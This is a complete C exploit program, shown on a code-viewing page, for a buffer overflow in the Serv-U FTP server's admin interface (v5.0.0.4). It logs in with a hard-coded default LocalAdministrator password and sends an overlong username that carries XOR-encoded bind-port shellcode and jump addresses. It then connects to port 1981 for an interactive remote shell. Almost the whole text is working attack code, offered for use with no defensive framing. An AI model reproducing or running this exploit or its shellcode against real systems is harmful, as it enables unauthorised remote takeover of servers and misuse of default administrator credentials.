📄 seru.txt
字号:
-=-=-=-=-=-=-=-=-= start su_local_ecp.c -=-=-=-=-=-=-=-=-=
/*
|"USER="|sc|nop|long_jmp_back(5 bytes)|eip|short_jmp_back(2 bytes)|
|<------ 0x160+4 bytes ------------->|
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define offset (0x160-5-1)
#define short_jmp_back_9 "\xeb\xf5"
#define long_jmp_back_15B "\xE9\xA1\xFE\xFF\xFF"
#define jmpesp "\x12\x45\xfa\x7f"
//#define jmpesp "\x77\xe4\x2c\x75"//77e42c75
void shell (int sock);
#pragma comment(lib,"ws2_32")
unsigned char *szSend[5];
unsigned char szEvilUserName[512];
unsigned char szCreateUser[0x1000];
//shellcode ripped from :)
unsigned char sc_bind_port_1981[]=
//从esp往内存低处开始搜索需解码部分,以":)"为开始标记,以":)"为结束标记。
"\x8B\xDC"
"\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47"
//"\x43"//inc ebx
"\x4B"//dec ebx
"\x39\x33\x75"
"\xFB\x83\xC3\x04\x80\x33\x96\x43\x39\x3B\x75\xF8\x45\x59\x41\x53"
//sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by :)<:) at xfocus.org>
//XOR with 0x96 (267 0x10B bytes)
"\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
"\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
"\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
"\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
"\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
"\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
"\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
"\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
"\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
"\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
"\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
"\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
"\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
"\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
"\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
"\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
//decode end sign
"\x45\x59\x34\x53";
void usage(char *p)
{
printf("Usage: %s <-i ip> [-P port] [-u user] [-p pass]\n", p);
}
void main(int argc, char **argv)
{
struct sockaddr_in sa,server;
WSADATA wsd;
SOCKET s,s2;
int iErr;
char szRecvBuff[0x1000];
int i,ret;
int iPort=43958;
char *ip=NULL, *user = NULL, *pass = NULL, u[128], p[128];
printf( "Serv-U Admin interface create user with long name BOF exp v1\n"
"This version can exploit serv-u v5.0.0.4(maybe others)\n\n");
if(argc < 2)
{
usage(argv[0]);
return;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
//检查是否缺少参数
if(i == argc-1)
{
usage(argv[0]);
return;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 'P':
iPort=atoi(argv[i+1]);
break;
case 'u':
_snprintf(u, sizeof(u), "USER %s\r\n", argv[i+1]);
user=u;
break;
case 'p':
_snprintf(p, sizeof(p), "PASS %s\r\n", argv[i+1]);
pass=p;
break;
}
}
if(!ip)
{
printf("[-] Invalid parameter.\n");
return;
}
if(user && pass)
{
szSend[0] = user;
szSend[1] = pass;
}
else
{
szSend[0] = "USER LocalAdministrator\r\n";//user
szSend[1] = "PASS #l@$ak#.lk;0@P\r\n";//pass
}
szSend[2] = "SITE MAINTENANCE\r\n";
szSend[3] = "-SETDOMAIN\r\n"
"-Domain=wahaha|0.0.0.0|21218|-1|1|0\r\n"
"-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
szSend[4] = szCreateUser;
strcpy(szEvilUserName, sc_bind_port_1981);
i = strlen(szEvilUserName);
if(i > offset)
{
printf("[-] shellcode too long.\n");
return;
}
printf("[+] sc len = 0x%X %d bytes.\n", i, i);
printf("[+] pan len = 0x%X %d bytes.\n", offset-i, offset-i);
for(;i<offset;i++)
strcat(szEvilUserName, "A");
strcat(szEvilUserName, long_jmp_back_15B);
strcat(szEvilUserName, jmpesp);
strcat(szEvilUserName, short_jmp_back_9);
sprintf(szCreateUser, "-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=21218\r\n"
" User=%s\r\n", szEvilUserName);
__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d\n",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons(iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] connect to %s:%d error:%d\n", ip, iPort);
__leave;
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv:\n%s", szRecvBuff);
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send evil buff 0x%X %d bytes.\n", iErr, iErr);
else
printf("[+] Send:\n%s", szSend[i]);
}
printf("[+] Wait from shell.\n");
Sleep(2000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(1981);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Have fun! :)\n");
shell(s2);
}
__finally
{
if(s != INVALID_SOCKET) closesocket(s);
WSACleanup();
}
return;
}
/*
ripped from TESO code and
modifed by :) <:)@xfocus.org> for win32
*/
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
-=-=-=-=-=-=-=-=-= end su_local_ecp.c -=-=-=-=-=-=-=-=-=
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -